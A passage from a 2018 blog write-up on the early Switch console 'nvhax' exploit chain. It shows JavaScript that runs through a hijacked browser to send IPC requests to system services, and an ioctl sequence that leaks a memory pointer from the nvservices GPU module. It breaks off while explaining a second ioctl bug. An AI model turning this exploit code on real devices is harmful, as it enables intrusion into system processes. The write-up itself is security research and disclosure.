Friday, December 28, 2018

The Switch - A Memoir

Welcome to a new write-up! Almost a year after my last one on the Wii U...

Now, as we are getting close to the dawn of a new year, I will finally present one of the most fun exploit chains I ever had the privilege to discover and develop.
As you know, the Switch has seen many developments on the hacking front since its release and I'm proud to have taken part in a large number of them alongside SciresM, plutoo, derrek, naehrwert, yellows8, TuxSH, fincs, WinterMute and many others.
But before we reached the comfortable plateau we are in now, there were many complex attempts to defeat the Switch's security and today we will be looking into one of the earliest successful attempts to exploit the system from a bottom-up approach: the nvhax exploit.

To fully understand the context of this write-up we must go back to April 2017, a mere month after the Switch's international release.
Back then, everybody was trying to push the limits of the not-so-secret Internet Browser that came bundled with the Switch's OS. You may recall that this browser was vulnerable to a public and very popular bug known as CVE-2016-4657, notorious for being part of the Pegasus exploit chain. This allowed us to take over the browser's process with minimal effort less than a week after the Switch's release.
The next logical step was to escalate outside the browser's sandbox and attempt to exploit other, more privileged, parts of the system, and this is how our story begins...

Introduction


Exploiting the browser became a very pleasant task after the release of PegaSwitch (https://github.com/reswitched/pegaswitch), a JS-based toolkit that leverages vulnerabilities in the Switch's browser to build complex ROP chains.
Shortly after dumping the browser's binary from memory, documentation on the IPC system began to take form on the SwitchBrew wiki (https://switchbrew.org/wiki/Main_Page).
Before the generic IPC marshalling system now implemented in PegaSwitch existed, several of us began writing our own ways of talking to the Switch. One such example is rop-rpc (https://github.com/xyzz/rop-rpc), another toolkit designed for running ROP chains in the Switch's browser.

I decided to write my own functions on top of the very first release of PegaSwitch as you can see below (please note that this is severely outdated):

sploitcore.prototype.send_request = function(srv_handle, type, domain_id, cmd_id, params, dump_reply, show_log) {
var req_buf = this.malloc(0x1000);
if (show_log)
utils.log('Request buf: ' + utils.paddr(req_buf));
var request_reply = [0, 0];
var err_code = [0, 0];
// One handle and 2 words input type
if (type == 0)
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x80000010, req_buf, 0x04/4); // Write num_words
// Write handle descriptor
this.write4(0x00000002, req_buf, 0x08/4); // Write handle_copy_num
this.write4(params[0], req_buf, 0x0C/4); // Write handle_copy
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[1], req_buf, 0x20/4);
}
else if (type == 1) // One word input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000009, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write4(params[0], req_buf, 0x20/4);
}
else if (type == 2) // Descriptor B and one word input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_flags = 0;
var buf_desc_b = (((buf_addr[1] & 0xF) << 0x1C) | ((buf_size[1] & 0xF) << 0x18) | ((buf_addr[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x01000004, req_buf, 0x00/4); // Write type
this.write4(0x0000000C, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_b, req_buf, 0x10/4); // Write buf_desc_b
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x30/4);
this.write8(params[3], req_buf, 0x38/4);
}
else if (type == 3) // Descriptor A and one word input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_flags = 0;
var buf_desc_a = (((buf_addr[1] & 0xF) << 0x1C) | ((buf_size[1] & 0xF) << 0x18) | ((buf_addr[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x00100004, req_buf, 0x00/4); // Write type
this.write4(0x0000000C, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_a, req_buf, 0x10/4); // Write buf_desc_a
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write4(params[2], req_buf, 0x30/4);
}
else if (type == 4) // Current PID, domain descriptor and one word input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x8000000E, req_buf, 0x04/4); // Write num_words
// Write handle descriptor
this.write4(0x00000001, req_buf, 0x08/4); // Write handle_copy_num
this.write4(0x00000000, req_buf, 0x0C/4); // Write PID_lo
this.write4(0x00000000, req_buf, 0x10/4); // Write PID_hi
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write domain descriptor
this.write4(0x00180001, req_buf, 0x20/4); // Write extra_size
this.write4(domain_id, req_buf, 0x24/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x28/4); // Write padding
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
this.write4(0x49434653, req_buf, 0x30/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x34/4); // Write padding
this.write4(cmd_id, req_buf, 0x38/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x3C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x40/4);
}
else if (type == 5) // Domain descriptor and 6 words input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000012, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
// Write domain descriptor
this.write4(0x00280001, req_buf, 0x10/4); // Write extra_size
this.write4(domain_id, req_buf, 0x14/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x30/4);
this.write8(params[1], req_buf, 0x38/4);
this.write8(params[2], req_buf, 0x40/4);
}
else if (type == 6) // Descriptor B (flag 0x01), domain descriptor and 6 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_flags = 1;
var buf_desc_b = (((buf_addr[1] & 0xF) << 0x1C) | ((buf_size[1] & 0xF) << 0x18) | ((buf_addr[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x01000004, req_buf, 0x00/4); // Write type
this.write4(0x00000016, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_b, req_buf, 0x10/4); // Write buf_desc_b
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write domain descriptor
this.write4(0x00280001, req_buf, 0x20/4); // Write extra_size
this.write4(domain_id, req_buf, 0x24/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x28/4); // Write padding
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
this.write4(0x49434653, req_buf, 0x30/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x34/4); // Write padding
this.write4(cmd_id, req_buf, 0x38/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x3C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x40/4);
this.write8(params[3], req_buf, 0x48/4);
this.write8(params[4], req_buf, 0x50/4);
}
else if (type == 7) // Descriptor B (flag 0x01) and 6 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_flags = 1;
var buf_desc_b = (((buf_addr[1] & 0xF) << 0x1C) | ((buf_size[1] & 0xF) << 0x18) | ((buf_addr[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x01000004, req_buf, 0x00/4); // Write type
this.write4(0x00000012, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_b, req_buf, 0x10/4); // Write buf_desc_b
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x30/4);
this.write8(params[3], req_buf, 0x38/4);
this.write8(params[4], req_buf, 0x40/4);
}
else if (type == 8) // Descriptor X and 6 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_counter = 0x01;
var buf_desc_x = (((buf_size[0] & 0xFFFF) << 0x10) | ((buf_addr[1] & 0xF) << 0x0C) | (buf_counter & 0xE00) | ((buf_addr[1] & 0x70) << 0x02) | (buf_counter & 0x3F)) >>> 0;
// Build request
this.write4(0x00010004, req_buf, 0x00/4); // Write type
this.write4(0x0000000D, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_desc_x, req_buf, 0x08/4); // Write buf_desc_x
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x20/4);
this.write8(params[3], req_buf, 0x28/4);
this.write8(params[4], req_buf, 0x30/4);
}
else if (type == 9) // Query type
{
// Build request
this.write4(0x00000005, req_buf, 0x00/4); // Write type
this.write4(0x0000000A, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x20/4);
}
else if (type == 10) // 6 words input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x0000000E, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x20/4);
this.write8(params[1], req_buf, 0x28/4);
this.write8(params[2], req_buf, 0x30/4);
}
else if (type == 11) // Descriptor C and 2 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_desc_c = (((buf_size[0] & 0xFFFF) << 0x10) | (buf_addr[1] & 0xFF)) >>> 0;
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000C0A, req_buf, 0x04/4); // Write num_words and flags_desc_c
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x20/4);
this.write4(0x00000000, req_buf, 0x28/4); // Write padding
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write descriptors
this.write4(buf_addr[0], req_buf, 0x30/4); // Write buf_addr_lo
this.write4(buf_desc_c, req_buf, 0x34/4); // Write buf_desc_c
}
else if (type == 12) // Descriptor C and 6 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_desc_c = (((buf_size[0] & 0xFFFF) << 0x10) | (buf_addr[1] & 0xFF)) >>> 0;
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000C0E, req_buf, 0x04/4); // Write num_words and flags_desc_c
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x20/4);
this.write8(params[3], req_buf, 0x28/4);
this.write8(params[4], req_buf, 0x30/4);
this.write4(0x00000000, req_buf, 0x38/4); // Write padding
this.write4(0x00000000, req_buf, 0x3C/4); // Write padding
// Write descriptors
this.write4(buf_addr[0], req_buf, 0x40/4); // Write buf_addr_lo
this.write4(buf_desc_c, req_buf, 0x44/4); // Write buf_desc_c
}
else if (type == 13) // Descriptor A (2x) and 5 words input type
{
var buf_addr0 = params[0];
var buf_size0 = params[1];
var buf_addr1 = params[2];
var buf_size1 = params[3];
var buf_flags = 0;
var buf_desc_a0 = (((buf_addr0[1] & 0xF) << 0x1C) | ((buf_size0[1] & 0xF) << 0x18) | ((buf_addr0[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
var buf_desc_a1 = (((buf_addr1[1] & 0xF) << 0x1C) | ((buf_size1[1] & 0xF) << 0x18) | ((buf_addr1[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x00200004, req_buf, 0x00/4); // Write type
this.write4(0x00000012, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size0[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr0[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_a0, req_buf, 0x10/4); // Write buf_desc_a
this.write4(buf_size1[0], req_buf, 0x14/4); // Write buf_size_lo
this.write4(buf_addr1[0], req_buf, 0x18/4); // Write buf_addr_lo
this.write4(buf_desc_a1, req_buf, 0x1C/4); // Write buf_desc_a
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[4], req_buf, 0x30/4);
this.write8(params[5], req_buf, 0x38/4);
this.write8(params[6], req_buf, 0x40/4);
this.write8(params[7], req_buf, 0x48/4);
this.write8(params[8], req_buf, 0x50/4);
}
else if (type == 14) // Current PID, one handle, domain descriptor and one word input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x80000010, req_buf, 0x04/4); // Write num_words
// Write handle descriptor
this.write4(0x00000003, req_buf, 0x08/4); // Write handle_copy_num
this.write4(0x00000000, req_buf, 0x0C/4); // Write PID_lo
this.write4(0x00000000, req_buf, 0x10/4); // Write PID_hi
this.write4(params[0], req_buf, 0x14/4); // Write handle_copy
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write domain descriptor
this.write4(0x00180001, req_buf, 0x20/4); // Write extra_size
this.write4(domain_id, req_buf, 0x24/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x28/4); // Write padding
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
this.write4(0x49434653, req_buf, 0x30/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x34/4); // Write padding
this.write4(cmd_id, req_buf, 0x38/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x3C/4); // Write padding
// Write params
this.write8(params[1], req_buf, 0x40/4);
}
else if (type == 15) // Domain close descriptor
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000010, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
// Write domain descriptor
this.write4(0x00180002, req_buf, 0x10/4); // Write extra_size
this.write4(domain_id, req_buf, 0x14/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x30/4);
}
// Call svcSendSyncRequestByBuf
var request_res = this.svc(0x22, [req_buf, [0x1000, 0x00], [srv_handle, 0x00]], false);
if (show_log)
utils.log('svcSendSyncRequestByBuf: result == 0x' + request_res[0].toString(16));
// Request was accepted
if (request_res[0] == 0)
{
// Read service error code
if ((type == 4) || (type == 5) || (type == 6))
err_code[0] = this.read4(req_buf, 0x28/0x04);
else
err_code[0] = this.read4(req_buf, 0x18/0x04);
if (show_log)
utils.log('Got error code: 0x' + err_code[0].toString(16));
// Read back the reply on success
if (err_code[0] == 0)
{
// Take extra domain header into account
if (domain_id)
request_reply = this.read8(req_buf, 0x30/0x04);
else
request_reply = this.read8(req_buf, 0x20/0x04);
}
// Read the number of words in the reply
var num_reply_words = this.read4(req_buf, 0x04/0x04);
// Check for a reply handle
if (num_reply_words & 0x80000000)
{
var num_reply_handles = this.read4(req_buf, 0x08/0x04);
if (num_reply_handles == 0x20)
{
var reply_service_handle = this.read4(req_buf, 0x0C/0x04);
if (show_log)
utils.log('Got reply service handle: 0x' + reply_service_handle.toString(16));
// Return the handle in the reply
request_reply[0] = reply_service_handle;
}
else if (num_reply_handles == 0x22)
{
var reply_event_handle = this.read4(req_buf, 0x0C/0x04);
var reply_service_handle = this.read4(req_buf, 0x10/0x04);
if (show_log)
{
utils.log('Got reply event handle: 0x' + reply_event_handle.toString(16));
utils.log('Got reply service handle: 0x' + reply_service_handle.toString(16));
}
}
else
{
var reply_unk_handle = this.read4(req_buf, 0x0C/0x04);
if (show_log)
utils.log('Got reply unknown handle: 0x' + reply_unk_handle.toString(16));
}
}
// Dump reply if necessary
if (dump_reply)
this.memdump(req_buf, 0x1000, "memdumps/srv_reply.bin");
}
else if (request_res[0] == 0xF601)
{
// Close the handle
var close_res = this.svc(0x16, [srv_handle], false);
if (show_log)
utils.log('svcCloseHandle: result == 0x' + close_res[0].toString(16));
}
this.free(req_buf);
return [request_res, err_code, request_reply];
}
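The buf_desc_a/buf_desc_b words packed inline in send_request follow a fixed bit layout. Here is a small standalone sketch of that packing and its inverse (the helper names are mine, not part of PegaSwitch):

```javascript
// Hypothetical helpers re-deriving the A/B buffer descriptor word used above.
// addr_hi/size_hi are the upper 32 bits of the 64-bit buffer address/size.
function packBufDesc(addr_hi, size_hi, flags) {
    return (((addr_hi & 0xF) << 0x1C) |   // address bits 32-35
            ((size_hi & 0xF) << 0x18) |   // size bits 32-35
            ((addr_hi & 0x70) >> 0x02) |  // address bits 36-38
            (flags & 0x03)) >>> 0;        // buffer flags
}

// Inverse, handy for sanity-checking a packed word
function unpackBufDesc(desc) {
    return {
        addr_hi: ((desc >>> 0x1C) & 0xF) | (((desc >>> 0x02) & 0x7) << 4),
        size_hi: (desc >>> 0x18) & 0xF,
        flags: desc & 0x03
    };
}
```

Round-tripping a value (e.g. packBufDesc(0x25, 0x1, 0) gives 0x51000008, which unpacks back to the same fields) is a quick way to confirm the field placement.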
Using this send_request function and the "bridge" system (PegaSwitch's way of calling arbitrary functions within the browser's memory space), I could now talk to other services accessible to the browser.
Since this was before smhax was discovered, I didn't know I could just bypass the restrictions imposed by the browser's NPDM, so I focused exclusively on the services that the browser itself would normally use.
From these, nvservices immediately caught my attention due to the large number of symbols left inside the browser's binary which, in turn, made black box analysis of the nvservices system module much easier. This also allowed me to document everything on the SwitchBrew wiki fairly quickly (see https://switchbrew.org/wiki/NV_services).

The nvservices system module provides a high-level interface to the GPU (and a few other engines), abstracting away all the low-level details that a regular application doesn't need to bother with. Its most important part is the nvdrv service family which, as the name implies, provides a communication channel to the NVIDIA drivers inside the nvservices system module.
You can easily see the parallels with the L4T (Linux for Tegra) source code but, for obvious reasons, in the Switch's OS the graphics drivers are isolated in a system module instead of being implemented in the kernel.

So, with a combination of reverse engineering and studying Tegra's source code, I could steadily document the nvdrv command interface and, more importantly, how to reach the ioctl system that the driver revolves around. There are many ioctl commands for each device interface, so this sounded like the perfect attack surface for exploiting nvservices.
Over several weeks I did nothing but fuzz as many ioctl commands as I could reach and, eventually, I found the bugs that would form the core of what would become the nvhax exploit.

The Bug(s)


The very first bug I found was in the /dev/nvmap device interface. This interface's purpose is to provide a way for creating and managing memory containers that serve as backing memory for many other parts of the GPU system.

From the browser's perspective, accessing this device interface consists of the following steps:
  • Open a service session with nvdrv:a (a variation of nvdrv, available only to applets such as the browser).
  • Call the IPC command Initialize which supplies memory allocated by the browser to the nvservices system module.
  • Call the IPC command Open on the /dev/nvmap interface.
  • Submit ioctl commands by using the IPC command Ioctl.
  • Close the interface with the IPC command Close.
Since we are hijacking the browser mid-execution, a service session with nvdrv:a has already been created and the Initialize IPC command has already been invoked. After finding the service handle for this session, we can simply send Open and Ioctl commands to any interface we like.
In this case, while messing around with the /dev/nvmap interface I found a bug in the NVMAP_IOC_FREE ioctl command that would leak back a memory pointer from the nvservices memory space:

sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
    var temp_buf = this.malloc(0x1000);
    var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);
    // Setup buffers
    var in_buf_ioctl = utils.add2(temp_buf, 0x000);
    var out_buf_ioctl = utils.add2(temp_buf, 0x100);
    var out_buf_status = utils.add2(temp_buf, 0x200);
    var in_buf = utils.add2(temp_buf, 0x800);
    var out_buf = utils.add2(temp_buf, 0x900);
    var ioctl_num = 0;
    // Prepare in/out buffers
    this.write8(in_buf, in_buf_ioctl, 0x00/4); // Write the input buffer's address
    this.write4(0x00000100, in_buf_ioctl, 0x08/4); // Write the input buffer's size
    this.write8(out_buf, out_buf_ioctl, 0x00/4); // Write the output buffer's address
    this.write4(0x00000100, out_buf_ioctl, 0x08/4); // Write the output buffer's size
    // Setup the creation params
    this.write4(0x00010000, in_buf, 0x00/4);
    // Call NVMAP_IOC_CREATE
    ioctl_num = 0xC0080101;
    var ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
    // Read status
    var ioctl_status = this.read4(out_buf_status);
    // Read back handle
    var nvmap_handle = this.read4(out_buf, 0x04/4);
    if (this.nvdrv_show_log)
        utils.log('nvdrv_ioctl (NVMAP_IOC_CREATE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_handle == 0x" + nvmap_handle.toString(16));
    // Setup the allocation params
    this.write4(nvmap_handle, in_buf, 0x00/4); // handle
    this.write4(0x00000000, in_buf, 0x04/4); // heap mask
    this.write4(0x00000001, in_buf, 0x08/4); // flags
    this.write4(0x00001000, in_buf, 0x0C/4); // align
    this.write4(0x00000000, in_buf, 0x10/4); // kind
    this.write4(0x00000000, in_buf, 0x14/4); // padding
    this.write4(0x00000000, in_buf, 0x18/4); // mem_addr_lo
    this.write4(0x00000000, in_buf, 0x1C/4); // mem_addr_hi
    // Call NVMAP_IOC_ALLOC
    ioctl_num = 0xC0200104;
    ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
    // Read status
    ioctl_status = this.read4(out_buf_status);
    // Read back result
    var nvmap_alloc_res = this.read4(out_buf);
    if (this.nvdrv_show_log)
        utils.log('nvdrv_ioctl (NVMAP_IOC_ALLOC): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_alloc_res == 0x" + nvmap_alloc_res.toString(16));
    // Setup the free params
    this.write4(nvmap_handle, in_buf, 0x00/4); // handle
    this.write4(0x00000000, in_buf, 0x04/4); // flags
    this.write4(0x00000000, in_buf, 0x08/4); // mem_addr_lo
    this.write4(0x00000000, in_buf, 0x0C/4); // mem_addr_hi
    this.write4(0x00000000, in_buf, 0x10/4); // mem_size
    this.write4(0x00000000, in_buf, 0x14/4); // mem_is_cached
    // Call NVMAP_IOC_FREE
    ioctl_num = 0xC0180105;
    ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
    // Read status
    ioctl_status = this.read4(out_buf_status);
    // Read back result
    var nvmap_free_res = this.read4(out_buf);
    if (this.nvdrv_show_log)
        utils.log('nvdrv_ioctl (NVMAP_IOC_FREE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_free_res == 0x" + nvmap_free_res.toString(16));
    // Read back the leaked pointer
    var leak_ptr = this.read8(out_buf, 0x08/4);
    utils.log('Leaked ptr: ' + utils.paddr(leak_ptr));
    this.free(temp_buf);
    return leak_ptr;
}
I later found out that a few others had also stumbled upon this bug, so I stashed it away for a while.
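As an aside, the ioctl numbers used above (0xC0080101, 0xC0200104, 0xC0180105) aren't arbitrary: they follow the standard Linux ioctl encoding, with the direction in bits 30-31, the argument size in bits 16-29, the "magic" type in bits 8-15 and the command number in bits 0-7. A quick sketch to reconstruct them (helper names are mine):

```javascript
// Sketch of the Linux-style ioctl number encoding used by nvservices.
var IOC_WRITE = 1, IOC_READ = 2;

function ioc(dir, type, nr, size) {
    return ((dir << 30) | (size << 16) | (type << 8) | nr) >>> 0;
}

function iowr(type, nr, size) {
    return ioc(IOC_READ | IOC_WRITE, type, nr, size);
}

// The nvmap commands used above (type 0x01 is nvmap's magic here):
var NVMAP_IOC_CREATE = iowr(0x01, 0x01, 0x08); // 0xC0080101
var NVMAP_IOC_ALLOC  = iowr(0x01, 0x04, 0x20); // 0xC0200104
var NVMAP_IOC_FREE   = iowr(0x01, 0x05, 0x18); // 0xC0180105
```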

A few days later I was messing around with the /dev/nvhost-ctrl-gpu interface and got a weird crash in one of its ioctl commands: NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE.
Reverse engineering the browser's code revealed that this ioctl was indeed present, but no code path could be taken to call it under normal circumstances. Furthermore, I was able to observe that this particular ioctl command would only take a struct with a single u64 as its argument.
After finding it in the Tegra source code (see https://github.com/arter97/android_kernel_nvidia_shieldtablet/blob/master/include/uapi/linux/nvgpu.h#L315) I was able to deduce that it was expecting a nvgpu_gpu_wait_pause_args struct, which contains a single field: a u64 pwarpstate.
As it turns out, pwarpstate is a pointer to a warpstate struct which contains 3 u64 fields: valid_warps, trapped_warps and paused_warps.
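Each SM's state therefore comes back as three consecutive u64 fields, 24 bytes in total. A minimal sketch of parsing one such struct out of a raw reply buffer (the helper name is mine):

```javascript
// Parse one 24-byte warpstate struct (3 consecutive u64 fields)
// out of a raw little-endian buffer.
var WARPSTATE_SIZE = 0x18;

function parseWarpstate(buf, offset) {
    var view = new DataView(buf, offset || 0, WARPSTATE_SIZE);
    return {
        valid_warps:   view.getBigUint64(0x00, true), // little-endian u64
        trapped_warps: view.getBigUint64(0x08, true),
        paused_warps:  view.getBigUint64(0x10, true)
    };
}
```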

Without going into much detail on how the GM20B (Tegra X1's GPU) works:
  • The GM20B has 1 GPC (Graphics Processing Cluster). 
  • Each GPC has 2 TPCs (Texture Processing Clusters or Thread Processing Clusters, depending on context). 
  • Each TPC has 2 SMs (Streaming Multiprocessors) and each contains 8 processor cores.
  • Each SM can run up to 128 "warps".
  • A "warp" is a group of 32 parallel threads that runs inside a SM.
So, basically, this ioctl signals the GPC to pause and tries to return information on the "warps" running on each SM inside TPC0 (TPC1 is ignored).
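Putting those numbers together (assuming the hierarchy as listed above), the size of the data this ioctl writes falls out directly:

```javascript
// Quick arithmetic over the GM20B hierarchy described above.
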